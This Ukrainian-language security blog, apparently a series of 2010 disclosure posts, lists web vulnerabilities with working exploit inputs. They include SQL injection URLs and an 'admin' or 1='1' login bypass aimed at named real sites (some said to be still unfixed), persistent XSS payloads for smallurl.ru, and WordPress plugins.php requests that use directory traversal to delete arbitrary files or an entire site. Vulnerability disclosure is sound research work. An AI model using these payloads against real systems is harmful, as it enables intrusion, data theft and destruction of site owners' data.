Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Home FTP Server ‘SITE INDEX’ Command Remote Denial of Service Vulnerability (деталі)
• Home FTP Server ‘MKD’ Command Directory Traversal Vulnerability (деталі)
• Sandbox 2.0.3 Multiple Remote Vulnerabilities (деталі)
• Pligg Installation File XSS Vulnerability (деталі)
• Re: RunCMS XSS Vulnerability via User Agent (деталі)
• RhinoSoft Serv-U TEA Decoding Buffer Overflow (деталі)
• XSS vulnerability in CruxCMS (деталі)
• XSS vulnerability in CruxCMS (деталі)
• XSS vulnerability in CruxPA (деталі)
• HP Discovery & Dependency Mapping Inventory (DDMI) Running on Windows, Remote Execution of Arbitrary Code (деталі)

27.01.2010

У червні, 28.06.2009, я знайшов Full path disclosure та SQL Injection уразливості на проекті http://www.betta.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

01.10.2010

Full path disclosure:

http://www.betta.ua/?pageid=-1

SQL Injection:

http://www.betta.ua/?pageid=-1%20or%20version()=5

Дані уразливості вже виправлені. Але адмінам сайта є куди покращувати його безпеку.

Через два місяці після проведення проекту День багів в WordPress 2 (Day of bugs in WordPress 2) я публікую численні уразливості в WordPress. Це в якості попереднього анонсу Дня багів в WordPress 3, який відбудеться з часом .

У серпні, 14.08.2010, я знайшов Cross-Site Scripting, Full path disclosure, Information Leakage, Directory Traversal, Arbitrary File Deletion і Denial of Service уразливості в WordPress.

Для всіх цих атак потрібно мати доступ до адмінського акаунта, або мати акаунт з правами для роботи з плагінами. Або атакувати адміна чи іншого користувача з необхідними правами через XSS, щоб дізнатися токен, призначений для захисту від CSRF атак.

Тому користувачам WordPress особливо переживати за ці дірки не треба (якщо не допускати вищезгаданих вимог). Але дані уразливості стануть в нагоді секюріті дослідникам при доступі до адмінки або наявності XSS на сайті. Тому розробникам WP бажано їх виправити.

Перевірено в WordPress 2.0.11, 2.6.2, 2.7, 2.8, 2.9.2, 3.0.1. Версії 2.0.х невразливі, тому що в них немає даного функціоналу. До різних уразливостей вразливі WordPress 2.6 - 3.0.1 та потенційно попередні версії.

Коментуючи XSS уразливість в WordPress 3.0.1, я зазначив додаткову інформацію стосовно XSS уразливості. Дані нюанси відносяться і до нищенаведених уразливостей. Атакувати можна як черех параметр checked[0], так через checked[1] і т.д., а також через checked[]. В версіях WP 2.7 і вище можна використовувати параметр action=delete-selected, а в версіях 2.8 і вище можна використовувати також параметр action2=delete-selected.

XSS:

Як я зазначав в вищезгаданому записі, в WordPress 2.6.x Cross-Site Scripting атака проводиться по іншому. І користі від даної XSS майже немає.

Для атаки потрібно послати POST запит до http://site/wp-admin/plugins.php з параметрами _wpnonce рівному значенню токена, delete-selected рівному “Delete” та checked[] рівному <body onload=alert(document.cookie)>.

Уразливі WordPress 2.6.x та потенційно попередні версії.

Full path disclosure:

Для атаки потрібно послати POST запит до http://site/wp-admin/plugins.php з параметрами _wpnonce рівному значенню токена, delete-selected рівному “Delete” та checked[] рівному “1″.

Уразливі WordPress 2.6.x та потенційно попередні версії.

Full path disclosure:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище).

Full path disclosure:

http://site/wp-admin/plugins.php

Повний шлях виводиться прямо на сторінці з плагінами.

Уразливі WordPress 2.6 - 2.7.1.

Information Leakage + Directory Traversal:

На сторінці (в списку під лінкою Click to view entire list of files which will be deleted) виводиться перелік файлів в поточній папці та підпапках.

В папці http://site/wp-content/plugins/:
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=

В папці http://site/wp-content/:
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище). А також WordPress 2.6.х. В версіях 2.6.х потрібно послати відповідний POST запит до http://site/wp-admin/plugins.php (як зазначалось вище).

Arbitrary File Deletion + DoS:

Якщо послати вищенаведені запити з параметром verify-delete=1, то можна видалити файли та папки в поточній папці та підпапках. Враховуючи Directory Traversal можна видалити як всі плагіни, так й інші файли в інших папках, в тому числі можна провести DoS атаку на сайт (якщо видалити важливі файли WP). Наприклад з запитом checked[]=../../1 можна видалити весь сайт.

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1&verify-delete=1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1&verify-delete=1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище). А також WordPress 2.6.х. В версіях 2.6.х потрібно послати відповідний POST запит до http://site/wp-admin/plugins.php (як зазначалось вище).

25.01.2010

У червні, 01.06.2009, я знайшов Cross-Site Scripting уразливість на популяному проекті http://imageshack.us. Про що найближчим часом сповіщу адміністрацію проекту.

В статті Редиректори через Flash, я вже розповідав про використання imageshack.us для редирекції на рекламуємі спамерами чи зловмисні сайти. Що можливе через завантаження шкідливих flash файлів на даний хостінг зображень. Тобто це XSS атака через Flash, як і випадку megaswf.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.09.2010

XSS:

• alert(document.cookie)

Дана уразливість вже виправилена.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPress Polls та WP-Forum. Для котрих з’явилися експлоіти. WordPress Polls - це плагін для створення голосувань, WP-Forum - це плагін для створення форуму.

• WordPress Polls 2.x Incorrect Flood Filter (деталі)
• WP-Forum <= 2.3 SQL Injection vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

23.01.2010

У травні, 27.05.2009, я знайшов Cross-Site Scripting та Abuse of Functionality уразливості на проекті http://smallurl.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

29.09.2010

XSS:

POST запит на сторінці http://smallurl.ru
http://site.ru"><script>alert(document.cookie)</script>В полі для вказання URL.

Це Persistent XSS. Код виконається на сторінках http://smallurl.ru/aed774.html (зараз цієї сторінки немає і даний функціонал редиректора перероблений), http://smallurl.ru/ ?module=ShortURL та http://smallurl.ru/?module=ShortHits.

Abuse of Functionality:

В “дополнительные опции” є можливість створення довільної адреси для URL, що дозволяє створювати зациклені редиректи з іншими редиректорами (для проведення DoS атак).

Зараз цієї опції не видно, вона можливо доступна лише для зареєстрованих користувачів. Дана уразливість подібна до Abuse of Functionalty на tinyurl.com, про що я розповідав в статтях Пекло редиректорів та Пекельний вогонь для редиректорів.

Дані уразливості переважно досі не виправлені.

В даній добірці уразливості в веб додатках:

• XM Easy Personal FTP Server ‘LIST’ Command Remote DoS Vulnerability (деталі)
• Exponent Slideshow XSS Vulnerability (деталі)
• Pligg Installation File XSS Vulnerability (деталі)
• Crypto backdoor in Qnap storage devices (деталі)
• RunCMS XSS Vulnerability via User Agent (деталі)
• ArtForms 2.1b7.2 RC2 Joomla Component Multiple Remote Vulnerabilities (деталі)
• MODx Installation File XSS Vulnerability (деталі)
• HP curiosity and vulnerability (деталі)
• DCP-Portal Multiple XSS Vulnerabilities (деталі)
• Alteon OS BBI (Nortell) - Multiple Vulnerabilities (деталі)

20.02.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливість на сайті http://www.bandofwarriors.org. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

28.09.2010

SQL Injection:

http://www.bandofwarriors.org/mpn/print.php?sid=-1%20or%20version()=3.23

Уразливість досі не виправлена.

08.02.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливості на сайті http://www.vilmorin.com.au (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на rozetka.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.09.2010

SQL Injection (Auth Bypass):

На сторінці http://www.vilmorin.com.au/admin/

admin’ or 1=’1
В полі username.

‘ or ‘1′=’1
В полі password.

Зараз сайт не працює. Схоже, що замість виправлення дірок, власники сайта вірішили його закрити.

Є такий цікавий сервіс як browsershots.org, який дозволяє проводити перевірки сумісності веб сайтів з браузерами. Всього доступна первірка в 77 браузерах на 4 платформах (Linux, Windows, Mac та BSD). І даний сервіс може використовуватися для проведення атак на інші сайти.

В серпні, 15.08.2010, я знайшов Abuse of Functionality та Insufficient Anti-automation на сайті http://browsershots.org. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

Abuse of Functionality:

На сторінці http://browsershots.org в полі URL.

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сервіс. Враховуючи те, що один запит до даного сервісу (з метою атаки на інший сайт) призводить до 77 запитів до цільового сайта, це значно посилює кожну атаку.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі).

P.S.

В 2013 році в сервісі вже 158 різних браузерів, що призводить до 158 запитів до цільового сайта.